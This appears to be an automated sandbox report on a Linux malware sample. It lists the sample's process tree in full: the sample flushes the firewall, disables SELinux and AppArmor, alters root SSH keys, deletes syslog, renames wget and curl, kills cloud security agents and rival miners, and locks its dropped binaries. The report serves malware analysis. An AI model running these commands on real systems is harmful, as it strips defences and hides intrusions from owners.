Analysis
-
max time kernel
22s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
01-07-2024 01:08
Static task
static1
Behavioral task
behavioral1
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Resource
debian9-mipsel-20240611-en
General
-
Target
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
-
Size
46KB
-
MD5
150dc9ae7c5729552ec2e92a7bc49095
-
SHA1
2aed6d97f2c3400e1eb7e136e245a6f45ef4ae1f
-
SHA256
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40
-
SHA512
13c40ba893a9f7a0f3e674400025f65e041e91f09b6def779078e391e35a3dedaf55742e68ae0b9b6f3c9120c1628266fb16348b674e988d146ed3d7b2c3f9c7
-
SSDEEP
768:bxlT2wDuWvWi7JFNcuFkc2zq0x3UKnicZuiR/amT8z:8wF+Lc2/FicfSmT8z
Malware Config
Signatures
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
-
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
Processes:
iptablespid process 655 iptables -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
chattrxargsxargsxargsgrepchattrxargsxargsxargschattrxargsxargschattrchattrxargschattrchattrxargsxargsxargsxargschattrxargsxargsxargsxargsxargsxargschattrchattrgrepxargschattrxargschattrchattrchattrxargschattrxargsxargsxargschattrxargsxargschattrxargsxargschattrxargspid process 647 chattr 801 xargs 925 xargs 1013 xargs 703 grep 890 chattr 931 xargs 997 xargs 915 xargs 884 chattr 823 xargs 841 xargs 883 chattr 888 chattr 937 xargs 876 chattr 879 chattr 949 xargs 991 xargs 733 xargs 834 xargs 877 chattr 955 xargs 815 xargs 849 xargs 943 xargs 967 xargs 979 xargs 880 chattr 889 chattr 705 grep 855 xargs 886 chattr 1003 xargs 663 chattr 892 chattr 882 chattr 985 xargs 660 chattr 861 xargs 973 xargs 1008 xargs 665 chattr 808 xargs 961 xargs 653 chattr 794 xargs 920 xargs 668 chattr 740 xargs -
Disables AppArmor 16 IoCs
Disables AppArmor security module.
Processes:
systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlpid process 707 systemctl 714 systemctl 720 systemctl 715 systemctl 715 systemctl 715 systemctl 715 systemctl 707 systemctl 723 systemctl 707 systemctl 707 systemctl 707 systemctl 707 systemctl 715 systemctl 715 systemctl 728 systemctl -
Disables SELinux 1 IoCs
Disables SELinux security module.
Processes:
setenforcepid process 706 setenforce -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 1 TTPs 6 IoCs
Processes:
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknowndescription ioc process File opened for modification /usr/bin/ip6network 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown File opened for modification /usr/bin/kswaped 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown File opened for modification /usr/bin/irqbalanced 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown File opened for modification /usr/bin/rctlcli 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown File opened for modification /usr/bin/systemd-network 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown File opened for modification /usr/bin/pamdicks 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown -
Reads CPU attributes 1 TTPs 20 IoCs
Processes:
pspspspspspspspspspspspspspspspspssysctlpspsdescription ioc process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online sysctl File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 8 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctldescription ioc process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
Processes:
pspspspspspspspspspsawkpspsxargsmvpspspspsmvmvpsdescription ioc process File opened for reading /proc/19/status ps File opened for reading /proc/285/cmdline ps File opened for reading /proc/744/stat ps File opened for reading /proc/21/stat ps File opened for reading /proc/9/stat ps File opened for reading /proc/858/stat ps File opened for reading /proc/593/stat ps File opened for reading /proc/731/status ps File opened for reading /proc/96/cmdline ps File opened for reading /proc/11/stat ps File opened for reading /proc/sys/kernel/osrelease ps File opened for reading /proc/24/stat ps File opened for reading /proc/733/stat ps File opened for reading /proc/74/cmdline ps File opened for reading /proc/834/status ps File opened for reading /proc/74/status ps File opened for reading /proc/self/maps awk File opened for reading /proc/23/stat ps File opened for reading /proc/793/status ps File opened for reading /proc/138/cmdline ps File opened for reading /proc/self/fd xargs File opened for reading /proc/filesystems mv File opened for reading /proc/154/status ps File opened for reading /proc/29/cmdline ps File opened for reading /proc/5/status ps File opened for reading /proc/166/status ps File opened for reading /proc/2/status ps File opened for reading /proc/135/status ps File opened for reading /proc/146/status ps File opened for reading /proc/309/status ps File opened for reading /proc/847/status ps File opened for reading /proc/635/stat ps File opened for reading /proc/747/cmdline ps File opened for reading /proc/283/cmdline ps File opened for reading /proc/20/status ps File opened for reading /proc/267/status ps File opened for reading /proc/25/status ps File opened for reading /proc/20/status ps File opened for reading /proc/832/cmdline ps File opened for reading /proc/43/cmdline ps File opened for reading /proc/9/cmdline ps File opened for reading /proc/10/stat ps File opened for reading /proc/267/stat ps File opened for reading /proc/594/stat ps File opened for reading /proc/13/cmdline ps File opened for reading /proc/636/status ps File opened for reading /proc/636/cmdline ps File opened for reading /proc/642/cmdline ps File opened for reading /proc/42/status ps File opened for reading /proc/filesystems mv File opened for reading /proc/filesystems mv File opened for reading /proc/17/stat ps File opened for reading /proc/12/status ps File opened for reading /proc/meminfo ps File opened for reading /proc/96/cmdline ps File opened for reading /proc/29/cmdline ps File opened for reading /proc/7/cmdline ps File opened for reading /proc/635/stat ps File opened for reading /proc/24/stat ps File opened for reading /proc/309/stat ps File opened for reading /proc/639/status ps File opened for reading /proc/uptime ps File opened for reading /proc/629/stat ps File opened for reading /proc/3/cmdline ps -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknowndescription ioc process File opened for modification /tmp/dev/null 1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown
Processes
-
/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown/tmp/1bf4fcd6d035805d44b5ae7ec67860911ed4c43f94e827c988992d0587d1ab40.unknown1⤵
- Write file to user bin folder
- Writes file to tmp directory
-
/bin/chmodchmod 777 /usr/bin/chattr2⤵
-
/bin/chmodchmod 777 /bin/chattr2⤵
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
- Attempts to change immutable files
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
- Attempts to change immutable files
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
/bin/rmrm -rf /tmp/keys2⤵
-
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
-
/bin/syncsync2⤵
-
/bin/catcat /var/spool/cron/2⤵
-
/bin/catcat /root/.ssh/authorized_keys2⤵
-
/bin/mvmv /usr/bin/wgettnt /usr/bin/wd12⤵
-
/bin/mvmv /usr/bin/curltnt /usr/bin/cd12⤵
- Reads runtime system information
-
/bin/mvmv /usr/bin/wget1 /usr/bin/wd12⤵
-
/bin/mvmv /usr/bin/curl1 /usr/bin/cd12⤵
-
/bin/mvmv /usr/bin/cur /usr/bin/cd12⤵
-
/bin/mvmv /usr/bin/cdl /usr/bin/cd12⤵
- Reads runtime system information
-
/bin/mvmv /usr/bin/cdt /usr/bin/cd12⤵
-
/bin/mvmv /usr/bin/xget /usr/bin/wd12⤵
-
/bin/mvmv /usr/bin/wge /usr/bin/wd12⤵
-
/bin/mvmv /usr/bin/wdl /usr/bin/wd12⤵
-
/bin/mvmv /usr/bin/wdt /usr/bin/wd12⤵
-
/bin/mvmv /usr/bin/wget /usr/bin/wd12⤵
- Reads runtime system information
-
/bin/mvmv /usr/bin/curl /usr/bin/cd12⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
/usr/sbin/serviceservice apparmor stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Enumerates kernel/hardware configuration
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop apparmor.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/usr/sbin/serviceservice aliyun.service stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
/bin/systemctlsystemctl --quiet is-active multi-user.target3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop aliyun.service.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/bin/systemctlsystemctl disable aliyun.service2⤵
- Disables AppArmor
- Enumerates kernel/hardware configuration
-
/bin/grepgrep aegis2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep Yun2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$11}"2⤵
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
/usr/local/bin/dirnamedirname3⤵
-
/usr/sbin/dirnamedirname3⤵
-
/usr/bin/dirnamedirname3⤵
-
/bin/grepgrep aegis2⤵
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
/usr/local/bin/rmrm -rf3⤵
-
/usr/sbin/rmrm -rf3⤵
-
/usr/bin/rmrm -rf3⤵
-
/sbin/rmrm -rf3⤵
-
/bin/rmrm -rf3⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep hids2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$11}"2⤵
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
/usr/local/bin/dirnamedirname3⤵
-
/usr/sbin/dirnamedirname3⤵
-
/usr/bin/dirnamedirname3⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
/usr/local/bin/rmrm -rf3⤵
-
/usr/sbin/rmrm -rf3⤵
-
/usr/bin/rmrm -rf3⤵
-
/sbin/rmrm -rf3⤵
-
/bin/rmrm -rf3⤵
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
/usr/local/bin/dirnamedirname3⤵
-
/usr/sbin/dirnamedirname3⤵
-
/usr/bin/dirnamedirname3⤵
-
/usr/bin/awkawk "{print \$11}"2⤵
-
/bin/grepgrep cloudwalker2⤵
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
/usr/local/bin/rmrm -rf3⤵
-
/usr/sbin/rmrm -rf3⤵
-
/usr/bin/rmrm -rf3⤵
-
/sbin/rmrm -rf3⤵
-
/bin/rmrm -rf3⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$11}"2⤵
-
/bin/grepgrep titanagent2⤵
-
/usr/bin/xargsxargs rm -rf2⤵
-
/usr/local/sbin/rmrm -rf3⤵
-
/usr/local/bin/rmrm -rf3⤵
-
/usr/sbin/rmrm -rf3⤵
-
/usr/bin/rmrm -rf3⤵
-
/sbin/rmrm -rf3⤵
-
/bin/rmrm -rf3⤵
-
/usr/bin/xargsxargs dirname2⤵
-
/usr/local/sbin/dirnamedirname3⤵
-
/usr/local/bin/dirnamedirname3⤵
-
/usr/sbin/dirnamedirname3⤵
-
/usr/bin/dirnamedirname3⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep edr2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep aegis2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep Yun2⤵
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep hids2⤵
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep edr2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep cloudwalker2⤵
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep titanagent2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep sgagent2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep barad_agent2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/xargsxargs -I "{}" kill -9 "{}"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep hostguard2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/rmrm -rf /usr/local/aegis2⤵
-
/bin/sleepsleep 12⤵
-
/usr/bin/chattrchattr -i /usr/bin/ip6network2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -i /usr/bin/kswaped2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -i /usr/bin/irqbalanced2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -i /usr/bin/rctlcli2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -i /usr/bin/systemd-network2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -i /usr/bin/pamdicks2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +i /usr/bin/ip6network2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +i /usr/bin/kswaped2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +i /usr/bin/irqbalanced2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +i /usr/bin/rctlcli2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +i /usr/bin/systemd-network2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr +i /usr/bin/pamdicks2⤵
- Attempts to change immutable files
-
/bin/sleepsleep 12⤵
-
/bin/rmrm -f /tmp/.null2⤵
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=128"2⤵
- Reads CPU attributes
-
/bin/grepgrep 194.87.139.1032⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep 185.71.65.2382⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep 140.82.52.872⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep :232⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
- Reads runtime system information
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :1432⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep :22222⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep :33332⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep :33892⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :55552⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :66662⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :66652⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep :66672⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :77772⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep :84442⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :33472⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :100082⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
- Reads runtime system information
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :135312⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :33332⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/etc/zzhsFilesize
2B
MD5b026324c6904b2a9cb4b88d6d61c81d1
SHA1e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e
SHA2564355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865
SHA5123abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686
-
/usr/bin/irqbalancedFilesize
2B
MD56d7fce9fee471194aa8b5b6e47267f03
SHA1a3db5c13ff90a36963278c6a39e4ee3c22e2a436
SHA2561121cfccd5913f0a63fec40a6ffd44ea64f9dc135c66634ba001d10bcf4302a2
SHA5122b59d179d9815994f687383a886ea34109889756efca5ab27318cc67ce2a21261d12fa6fee6b8c716f72214ead55ee0d789d6c35cff977d40ef5728ba9188a80
-
/usr/bin/kswapedFilesize
2B
MD526ab0db90d72e28ad0ba1e22ee510510
SHA17448d8798a4380162d4b56f9b452e2f6f9e24e7a
SHA25653c234e5e8472b6ac51c1ae1cab3fe06fad053beb8ebfd8977b010655bfdd3c3
SHA51263e22ec2fbeebabf005e58fbfb0eee607c4aa417045a68a0cc63767b048e3559268d35e72f367d3b2dbd5dbddf12fc4397762ba149260b3795a0391713bddcd7
-
/usr/bin/pamdicksFilesize
2B
MD59ae0ea9e3c9c6e1b9b6252c8395efdc1
SHA1ccf271b7830882da1791852baeca1737fcbe4b90
SHA25606e9d52c1720fca412803e3b07c4b228ff113e303f4c7ab94665319d832bbfb7
SHA512f3d08a4bfef201adbe711e8805f96ff13909719107dcac81f4fc9185040d59d8d573344a0707e697f8b4f0212e0d79f3bdd6b86688dd8c54019b9d93c937f3ca
-
/usr/bin/rctlcliFilesize
2B
MD548a24b70a0b376535542b996af517398
SHA19c6b057a2b9d96a4067a749ee3b3b0158d390cf1
SHA2567de1555df0c2700329e815b93b32c571c3ea54dc967b89e81ab73b9972b72d1d
SHA512db545c410fd0c8ede533d5b0666cd2798ba380bd25b655619cd5fd3a33a255569b3ccc319bfdef3322d8392d894d15c2e6aa2d53346e6ac54eaf5d627bfe6a9a
-
/usr/bin/systemd-networkFilesize
2B
MD51dcca23355272056f04fe8bf20edfce0
SHA15d9474c0309b7ca09a182d888f73b37a8fe1362c
SHA256f0b5c2c2211c8d67ed15e75e656c7862d086e9245420892a7de62cd9ec582a06
SHA51229b3573989378848e91465abb8bb12aaad1c40f01ddba6ce5dce4de88d61d49621cd4272bc6f889cd469e9490040b412eb0a237cf2cd49c637da1d5de5903f3d
-
memory/977-1-0xb6c4c000-0xb6c5d044-memory.dmp